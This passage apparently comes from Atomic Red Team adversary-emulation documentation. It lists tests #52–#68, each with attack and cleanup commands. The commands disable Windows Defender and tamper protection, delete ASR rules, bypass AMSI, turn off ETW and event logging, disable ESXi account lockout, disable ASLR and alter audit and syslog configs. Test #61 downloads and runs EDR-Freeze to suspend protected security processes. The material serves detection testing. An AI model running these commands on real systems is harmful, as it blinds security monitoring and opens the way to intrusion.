reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
Cleanup Commands
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
Atomic Test #52: Tamper with Windows Defender Registry - Powershell
Disable Windows Defender by tampering with the Windows Defender registry keys through PowerShell.
Supported Platforms: Windows
auto_generated_guid: a72cfef8-d252-48b3-b292-635d332625c3
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 0
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 0
Cleanup Commands
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 1
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1
Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI
An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.
Supported Platforms: Linux
auto_generated_guid: 091a6290-cd29-41cb-81ea-b12f133c66cb
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local |
| vm_user | Specify the privilege user account on ESXi Server | string | root |
| vm_pass | Specify the privilege user password on ESXi Server | string | pass |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false
Disconnect-VIServer -Confirm:$false
Dependencies: Run with powershell!
Description: Check if VMWARE PowerCLI PowerShell Module is installed.
Check Prereq Commands
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
Get Prereq Commands
Install-Module -Name VMware.PowerCLI -Confirm:$false
Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or Intune; this test simulates an Intune-based rules deployment.
Supported Platforms: Windows
auto_generated_guid: eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$registryValueName = "ASRRules"
if (Test-Path "$registryPath\$registryValueName") {
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
} else {
New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
Write-Host "Registry value created: $registryValueName"
}
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO
This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune. This test simulates a GPO-based rules deployment.
Supported Platforms: Windows
auto_generated_guid: 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
$newValueData = "1"
New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
Write-Host "Registry value created: $newValueName with data $newValueData"
Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"
Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key
A threat actor could disable the AMSI function by adding a registry value named “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and setting its value to 0. Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
Supported Platforms: Windows
auto_generated_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null
Cleanup Commands
Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectively disable the Application event log channel. The change only takes effect after a restart.
Supported Platforms: Windows
auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "0" /f
Cleanup Commands
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f
Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectively disable the Application event log channel. The change only takes effect after a restart.
Supported Platforms: Windows
auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 0 -PropertyType "DWord" -Force
Cleanup Commands
New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 1 -PropertyType "DWord" -Force
Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd
This atomic simulates an activity where an attacker disables a specific ETW provider in the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Enabled". This would effectively remove that provider from the session, so no events of that type are emitted. The change only takes effect after a restart.
Supported Platforms: Windows
auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| ETWProviderGUID | Microsoft-Windows-SenseIR ETW Provider GUID | string | {B6D775EF-1436-4FE6-BAD3-9E436319E218} |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "0" /f
Cleanup Commands
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" /v "Enabled" /t REG_DWORD /d "1" /f
Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell
This atomic simulates an activity where an attacker disables a specific ETW provider in the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Enabled". This would effectively remove that provider from the session, so no events of that type are emitted. The change only takes effect after a restart.
Supported Platforms: Windows
auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| ETWProviderGUID | Microsoft-Windows-SenseIR ETW Provider GUID | string | {B6D775EF-1436-4FE6-BAD3-9E436319E218} |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 0 -PropertyType "DWord" -Force
Cleanup Commands
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
Atomic Test #61: Freeze PPL-protected process with EDR-Freeze
This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
Supported Platforms: Windows
auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| processName | PPL-protected process name to target | string | SecurityHealthService |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
# Enable SeDebugPrivilege
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class TokenAdjuster {
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TOKEN_PRIVILEGES {
public int PrivilegeCount;
public long Luid;
public int Attributes;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const uint TOKEN_QUERY = 0x0008;
public static bool EnableSeDebugPrivilege() {
IntPtr hToken;
if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
return false;
long luid;
if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
return false;
TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
tp.PrivilegeCount = 1;
tp.Luid = luid;
tp.Attributes = SE_PRIVILEGE_ENABLED;
return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
}
}
"@
$result = [TokenAdjuster]::EnableSeDebugPrivilege()
if ($result) {
Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
} else {
Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
exit 1
}
# Get basic process info
$process = Get-Process -Name "#{processName}" -ErrorAction Stop
$processName = $process.ProcessName
Write-Host "Process Name: $processName"
Write-Host "PID: $($process.Id)"
# Get executable path and user info
$query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
$wmiProcess = Get-WmiObject -Query $query
$owner = $wmiProcess.GetOwner()
Write-Host "User: $($owner.Domain)\$($owner.User)"
# Get the folder of the current script
$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
# Download latest EDR-Freeze package and extract (force replace)
$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
try {
Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
Write-Host "Download completed: $zipPath" -ForegroundColor Green
$extractFolder = $scriptFolder
if (Test-Path $zipPath) {
Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
if (Test-Path $extractFolder) {
# Ensure target exe not locked; attempt to stop any running instance silently
Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
}
Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
# Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
$archive = $null
try {
$archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
foreach ($entry in $archive.Entries) {
if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
if ($entry.FullName.EndsWith('/')) { # directory entry
$dirPath = Join-Path $extractFolder $entry.FullName
if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
continue
}
$destPath = Join-Path $extractFolder $entry.FullName
$destDir = Split-Path $destPath -Parent
if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
try {
# Use static extension method (PowerShell 5.1 compatible)
[System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
} catch {
Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
}
}
Write-Host "Extraction completed." -ForegroundColor Green
} finally {
if ($archive) { $archive.Dispose() }
}
}
} catch {
Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
}
# Wait 15s before putting the targeted process in a coma
Write-Host "Waiting 15s before putting $processName in a coma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 10s before putting $processName in a coma" -ForegroundColor Yellow
Start-Sleep -Seconds 5
Write-Host "Waiting 5s before putting $processName in a coma" -ForegroundColor Yellow
Start-Sleep -Seconds 3
Write-Host "Waiting 2s before putting $processName in a coma" -ForegroundColor Yellow
Start-Sleep -Seconds 2
# Put the targeted process in a coma for 15s
# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
Sort-Object LastWriteTime -Descending |
Select-Object -First 1 -ExpandProperty Name
if (-not $edrFreezeExeName) {
Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
exit 1
}
$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
Write-Host "$processName put in a coma for 15s, by targeting Process ID $($process.Id)" -ForegroundColor Yellow
Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
Cleanup Commands
Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
Write-Output "File deleted: $edrFreezeExe"
Atomic Test #62: Disable ASLR Via sysctl parameters - Linux
Detects execution of the sysctl command to set kernel.randomize_va_space=0, which disables Address Space Layout Randomization (ASLR) on Linux.
Supported Platforms: Linux
auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
sysctl -w kernel.randomize_va_space=0
Cleanup Commands
sysctl -w kernel.randomize_va_space=2
Atomic Test #63: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files.
Supported Platforms: Linux
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf |
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf |
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
Cleanup Commands
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
Atomic Test #64: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files.
Supported Platforms: Linux
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
Cleanup Commands
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
Atomic Test #65: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
Supported Platforms: Linux
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf |
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf |
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
Cleanup Commands
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
Atomic Test #66: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
Supported Platforms: Linux
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
Cleanup Commands
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
Atomic Test #67: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
Supported Platforms: Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe |
| session | The session to disable. | string | EventLog-Application |
| provider | The provider to disable. | string | Microsoft-Windows-Powershell |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
Cleanup Commands
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
Dependencies: Run with powershell!
Description: PSExec must be installed on the machine.
Check Prereq Commands
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry.
Supported Platforms: Windows
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
Cleanup Commands
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
